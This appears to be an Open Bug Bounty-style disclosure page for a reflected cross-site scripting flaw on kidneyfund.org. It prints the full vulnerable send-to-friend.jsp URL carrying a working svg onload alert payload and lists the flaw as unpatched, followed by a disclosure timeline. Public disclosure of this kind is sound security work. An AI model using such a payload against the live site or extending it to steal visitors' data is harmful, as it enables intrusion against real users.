
kidneyfund.org XSS vulnerability

Description

##### Vulnerable URL:

http://www.kidneyfund.org/send-to-friend.jsp?pid=317400685&title;=--%3E%22%3E%20%3C%22%20%3E%20%22%20%3C%20%20%22%20.,%20%22%20%3C%20%3E%20%22%20%3C/script%3E%3C/title%3E%22%3E%3Csvg/onload=alert(/XSSPOSED/)%3E%3A%20Send%20to%20Friend%3A%20Send%20to%20Friend%3A%20Send%20to%20Friend%3A%20American%20Kidney%20Fund%20(AKF)%20-%20Reaching%20Out%2C%20Giving%20Hope%2C%20Improving%20Lives&url;=%2Fsend-to-friend.jsp%3Fpid%3D317400685%26title%3DSend%2Bto%2BFriend%253A%2BSend%2Bto%2BFriend%253A%2BSend%2Bto%2BFriend%253A%2BAmerican%2BKidney%2BFund%2B(AKF)%2B-%2BReaching%2BOut%252C%2BGiving%2BHope%252C%2BImproving%2BLives%26url%3D%252Fsend-to-friend.jsp%253Fpid%253D317400685%2526title%253DSend%252Bto%252BFriend%25253A%252BSend%252Bto%252BFriend%25253A%252BAmerican%252BKidney%252BFund%252B(AKF)%252B-%252BReaching%252BOut%25252C%252BGiving%252BHope%25252C%252BImproving%252BLives%2526url%253D%25252Fsend-to-friend.jsp%25253Fpid%25253D317400685%252526title%25253DSend%25252Bto%25252BFriend%2525253A%25252BAmerican%25252BKidney%25252BFund%25252B(AKF)%25252B-%25252BReaching%25252BOut%2525252C%25252BGiving%25252BHope%2525252C%25252BImproving%25252BLives%252526url%25253D%2525252Fsend-to-friend.jsp%2525253Fpid%2525253D72152482%25252526itemID%2525253D224899

##### Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 30.07.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 270189
VIP website status:| No
Check kidneyfund.org SSL connection:| (Grade: F)

##### Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 17 January, 2017 03:27 GMT
Vulnerability existence verified and confirmed| 17 January, 2017 09:05 GMT
Generic security notifications sent to website owner| 17 January, 2017 09:05 GMT
Notification sent to subscribers (without technical details)| 17 January, 2017 10:17 GMT
Vulnerability details disclosed by researcher| 24 January, 2017 09:16 GMT